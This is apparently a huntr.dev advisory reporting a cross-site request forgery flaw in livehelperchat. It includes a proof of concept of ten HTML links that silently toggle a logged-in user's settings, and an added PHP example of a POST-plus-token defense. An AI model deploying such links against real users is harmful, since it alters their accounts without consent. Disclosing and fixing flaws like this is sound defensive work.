huntr | Khanhchauminh | 52182545-FDD6-4D4F-9FBA-25010F7F8CBA
History: Dec 14, 2021 - 8:57 a.m.

Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat

2021-12-14 08:57:39
khanhchauminh
www.huntr.dev
8

EPSS: 0.001 (Low), percentile 30.5%

Description

CSRF in the requests that switch the following settings between enabled and disabled:

- Dark/bright  
- Auto uppercase sentences  
- Do not scroll to the bottom on chat open  
- Auto preload previous visitor chat messages  
- Load previous message on scroll  
- New messages  
- New chats  
- Online  
- Based on activity  
- Visible  

Proof of Concept

<a href="https://demo.livehelperchat.com/site_admin/front/switchdashboard/(action)/mode">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_uppercase/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/no_scroll_bottom/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_preload/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/scroll_load/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/chat_message/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/new_chat_sound/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setoffline/true">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setalwaysonline/true">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setinvisible/true">CLICK ME!</a>

Impact

This vulnerability allows an attacker to trick users into enabling or disabling personal settings on their accounts.
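
Every URL in the proof of concept changes state on a plain GET, so following a link is enough to trigger it. The PHP below is an added example of the usual server-side guard (POST only, plus a per-session token); it is not Live Helper Chat's code or its actual fix, and the function names, the `csrf_token` field, the `name`/`value` parameters and the status codes are assumptions.

```php
<?php
// Added example. All names here (csrf_token, set_setting_guarded, the
// 'csrf_token' field) are hypothetical and not taken from Live Helper Chat.

// Settings reachable through the setsetting URLs in the proof of concept.
const TOGGLE_SETTINGS = ['auto_uppercase', 'no_scroll_bottom', 'auto_preload', 'scroll_load'];

// Return the per-session token, creating it on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a settings change may proceed. Returns an HTTP status code:
// 405 for a non-POST request, 403 for a missing or wrong token, 400 for an
// unknown setting, 204 once the value is stored.
function set_setting_guarded(string $method, array $post, array &$session, array &$settings): int
{
    if ($method !== 'POST') {
        return 405; // a followed link can only issue GET
    }
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token($session), $sent)) {
        return 403; // a cross-site form cannot read the user's token
    }
    $name = $post['name'] ?? '';
    if (!in_array($name, TOGGLE_SETTINGS, true)) {
        return 400;
    }
    $settings[$name] = ($post['value'] ?? '0') === '1' ? 1 : 0;
    return 204;
}

// Constructed requests, one per outcome.
$session = [];
$settings = [];
$token = csrf_token($session);

// Link click, as in the proof of concept.
echo set_setting_guarded('GET', [], $session, $settings), "\n";
// Cross-site form post without the token.
echo set_setting_guarded('POST', ['name' => 'auto_uppercase', 'value' => '0'], $session, $settings), "\n";
// Request from the application's own form, carrying the token.
echo set_setting_guarded('POST', ['csrf_token' => $token, 'name' => 'auto_uppercase', 'value' => '0'], $session, $settings), "\n";
```

Marking the session cookie `SameSite=Lax` is not a substitute for this check, because Lax cookies are still sent on top-level GET navigations such as a clicked link.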
